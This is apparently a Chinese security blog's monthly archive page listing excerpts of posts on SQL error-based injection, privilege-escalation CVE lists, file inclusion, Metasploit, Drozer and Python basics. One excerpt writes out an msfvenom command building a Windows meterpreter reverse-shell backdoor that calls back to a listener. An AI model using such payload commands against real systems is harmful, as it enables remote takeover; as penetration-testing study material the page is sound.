08 2017 档案
摘要:0x00 – 报错注入 mysql 报错注入, 我们有时候会遇到没有正常数据回显的注入. 这时候就需要报错注入来获得我们需要的数据. 我们经常用到的有 floor(),updatexml(),extractvalue() 通过查找资料发现还有一些函数. 由于这三个比较通用, 也就是在大部分 mysq
阅读全文
摘要:首先了解下常用域名记录 A记录 IP地址记录,记录一个域名对应的IP地址<!--more--> AAAA记录 IPv6 地址记录,记录一个域名对应的IPv6地址 CNAME记录 别名记录,记录一个主机的别名 MX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址 NS记录 域名服务器记录 ,记录
阅读全文
摘要:#CVE #Description #Kernels CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CV
阅读全文
摘要:漏洞列表 #Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/201
阅读全文
摘要:本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.ex
阅读全文
该文被密码保护。
摘要:在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹。、 在msf提示符下输入reload_all重新加载所有模块
阅读全文
摘要:今天参加一个面试,问到几个linux命令,卡壳了,然后就悲剧了,于是回来搜索了一下,整理了一些常用命令。 以下转自http://www.php100.com/html/webkaifa/Linux/2009/1106/3485.html 系统信息 1 arch 显示机器的处理器架构(1) 2 una
阅读全文
摘要:Drozer快速使用指南 1、简介: Drozer是一款用于测试android应用程序漏洞的安全评估工具,能够发现多种类型的安全的漏洞,免费版本的相关资源下载地址: https://www.mwrinfosecurity.com/products/drozer/community-edition/
阅读全文
摘要:PS:第一次发文,如果那里有差错万望朋友指出。如果在修补漏洞或者攻击技巧上面有什么好的姿势可以私我。我加上。 本篇文章主要分为了以下几个部分: 00x1 本地文件包含漏洞[lcoal file include简称:LFI] 00x2 远程文件包含漏洞[Removete File Include简称:
阅读全文
摘要:re模块是python中处理正在表达式的一个模块 正则表达式知识储备:http://www.cnblogs.com/huamingao/p/6031411.html 1. match(pattern, string, flags=0) 从字符串的开头进行匹配, 匹配成功就返回一个匹配对象,匹配失败就
阅读全文
摘要:文件操作: os.mknod("test.txt") 创建空文件fp = open("test.txt",w) 直接打开一个文件,如果文件不存在则创建文件 关于open 模式: w 以写方式打开,a 以追加模式打开 (从 EOF 开始, 必要时创建新文件)r+ 以读写模式打开w+ 以读写模式打开 (
阅读全文
摘要:在日常工作中经常遇见在文本中提取特定位置字符串的需求.python的正则性能好,很适合做这类字符串的提取,这里讲一下提取的技巧,正则表达式的基础知识就不说了,有兴趣的可以看re的教程. 提取一般分两种情况,一种是提取在文本中提取单个位置的字符串,另一种是提取连续多个位置的字符串.日志分析会遇到这种情
阅读全文
摘要:这周开始了实习, 由于公司的数据组使用的hadoop的数据仓库, 所以作为爬虫组的一般是把文件写入到文件中, 然后给数据组再次清洗。在选择文件的格式中, 选择了json。为什么呢? json的优势: 1. 数据体积方面。 JSON相对于XML来讲,数据的体积小,传递的速度更快些。 2. 传输速度方面
阅读全文
摘要:早就听说requests的库的强大,只是还没有接触,今天接触了一下,发现以前使用urllib,urllib2等方法真是太搓了…… 这里写些简单的使用初步作为一个记录 安装 http://cn.python-requests.org/en/latest/user/install.html#instal
阅读全文
摘要:python将dict中的unicode打印成中文 import jsona = {u'content': {u'address_detail': {u'province': u'\u5409\u6797\u7701', u'city': u'\u957f\u6625\u5e02', u'stree
阅读全文
摘要:Python 获取接口数据,解析JSON,写入文件 用于练手的例子,从国家气象局接口上获取JSON数据,将它写入文件中,并解析JSON; 总的来说,在代码量上,python代码量要比java少很多。而且python看起来更直观一些; 以下是代码:
阅读全文
摘要:#json string:s = json.loads('{"name":"test", "type":{"name":"seq", "parameter":["1", "2"]}}')print sprint s.keys()print s["name"]print s["type"]["name
阅读全文
浙公网安备 33010602011771号